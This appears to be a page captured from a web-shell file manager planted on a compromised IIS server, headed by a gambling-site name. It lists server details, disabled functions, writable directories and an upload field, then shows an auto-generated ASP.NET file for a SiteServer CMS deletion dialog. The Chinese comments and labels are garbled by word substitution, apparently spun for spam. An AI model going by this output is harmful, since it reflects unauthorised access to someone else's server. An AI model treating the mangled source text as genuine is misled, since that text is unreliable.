918博天堂

Server : Microsoft-IIS/10.0
System : Windows NT EBS-6136 10.0 build 17763 (Windows Server 2016) i586
User : jxgj ( 0)
PHP Version : 7.0.33
Disable Function : passthru,exec,system,shell_exec,proc_open,popen,pcntl_exec,socket_bind,stream_socket_server
Directory :  D:/tmp_aspnet/root/11bea598/9c22dac/
Upload File :
Current Directory [ Writeable ] Root Directory [ Writeable ]


Current File : D:/tmp_aspnet/root/11bea598/9c22dac/App_Web_00v11azk.28.cs
?#pragma checksum "D:\wwwroot\sczhuyun\wwwroot\SiteServer\cms\contentsLayerDelete.cshtml" "{ff1816ec-aa5e-4d10-87f7-6f4963833460}" "2555AAB9014F3FF4DC92E0319E796AF6C1F52522"
//------------------------------------------------------------------------------
// <auto-generated>
//     此代码由工具天生。
//     运行时版本:4.0.30319.42000
//
//     对此文件的更改可能会导致不正确的行为,并且若是
//     沉新天生代码,这些更改将会迷失。
// </auto-generated>
//------------------------------------------------------------------------------

namespace ASP {
    using System;
    using System.Collections.Generic;
    using System.IO;
    using System.Linq;
    using System.Net;
    using System.Web;
    using System.Web.Helpers;
    using System.Web.Security;
    using System.Web.UI;
    using System.Web.WebPages;
    using System.Web.WebPages.Html;
    
    
    public class _Page_SiteServer_cms_contentsLayerDelete_cshtml : System.Web.WebPages.WebPage {
        
#line hidden
        
        public _Page_SiteServer_cms_contentsLayerDelete_cshtml() {
        }
        
        protected System.Web.HttpApplication ApplicationInstance {
            get {
                return ((System.Web.HttpApplication)(Context.ApplicationInstance));
            }
        }
        
        public override void Execute() {
            
            #line 1 "D:\wwwroot\sczhuyun\wwwroot\SiteServer\cms\contentsLayerDelete.cshtml"
   Layout = "../Shared/_LayoutLayer.cshtml"; 
            
            #line default
            #line hidden
WriteLiteral("\n\n<table");

WriteLiteral(" class=\"bg-white table tablesaw table-bordered table-hover\"");

WriteLiteral(">\n  <thead>\n    <tr>\n      <th");

WriteLiteral(" class=\"text-center text-nowrap\"");

WriteLiteral(">内容Id </th>\n      <th>内容标题 </th>\n      <th");

WriteLiteral(" class=\"text-center text-nowrap\"");

WriteLiteral(">增长功夫</th>\n      <th");

WriteLiteral(" class=\"text-center text-nowrap\"");

WriteLiteral(">状态</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr");

WriteLiteral(" v-for=\"content in contents\"");

WriteLiteral(">\n      <td");

WriteLiteral(" class=\"text-center\"");

WriteLiteral(">{{ content.id }}</td>\n      <td");

WriteLiteral(" v-html=\"content.title\"");

WriteLiteral("></td>\n      <td");

WriteLiteral(" class=\"text-center text-nowrap\"");

WriteLiteral(">{{ content.addDate }}</td>\n      <td");

WriteLiteral(" class=\"text-center text-nowrap\"");

WriteLiteral(" v-html=\"content.checkState\"");

WriteLiteral("></td>\n    </tr>\n  </tbody>\n</table>\n\n<div");

WriteLiteral(" class=\"form-group form-row\"");

WriteLiteral(">\n  <label");

WriteLiteral(" class=\"col-1 text-right col-form-label col-form-label-sm\"");

WriteLiteral("></label>\n  <div");

WriteLiteral(" class=\"col-10 radio radio-primary\"");

WriteLiteral(">\n    <input");

WriteLiteral(" id=\"isNotRetainFiles\"");

WriteLiteral(" type=\"radio\"");

WriteLiteral(" v-model=\"isRetainFiles\"");

WriteLiteral(" value=\"true\"");

WriteLiteral(" />\n    <label");

WriteLiteral(" for=\"isNotRetainFiles\"");

WriteLiteral(" class=\"mr-2\"");

WriteLiteral(">保留天生的内容页面</label>\n    <input");

WriteLiteral(" id=\"isRetainFiles\"");

WriteLiteral(" type=\"radio\"");

WriteLiteral(" v-model=\"isRetainFiles\"");

WriteLiteral(" value=\"false\"");

WriteLiteral(" />\n    <label");

WriteLiteral(" for=\"isRetainFiles\"");

WriteLiteral(" class=\"mr-2\"");

WriteLiteral(">同时删除内容页面</label>\n    <small");

WriteLiteral(" class=\"text-muted\"");

WriteLiteral(">选择保留页面将仅在数据库中删除内容。</small>\n  </div>\n  <div");

WriteLiteral(" class=\"col-1 help-block\"");

WriteLiteral("></div>\n</div>\n\n<hr />\n\n<div");

WriteLiteral(" class=\"text-right mr-1\"");

WriteLiteral(">\n  <button");

WriteLiteral(" v-on:click=\"btnSubmitClick\"");

WriteLiteral(" type=\"button\"");

WriteLiteral(" class=\"btn btn-danger m-l-5\"");

WriteLiteral(">删 除</button>\n  <button");

WriteLiteral(" type=\"button\"");

WriteLiteral(" class=\"btn btn-default m-l-5\"");

WriteLiteral(" onclick=\"window.parent.layer.closeAll()\"");

WriteLiteral(">取 消</button>\n</div>\n\n");

DefineSection("Scripts", () => {

WriteLiteral("\n<script");

WriteLiteral(" src=\"contentsLayerDelete.js?v=6.15.51\"");

WriteLiteral(" type=\"text/javascript\"");

WriteLiteral("></script> ");

});

        }
    }
}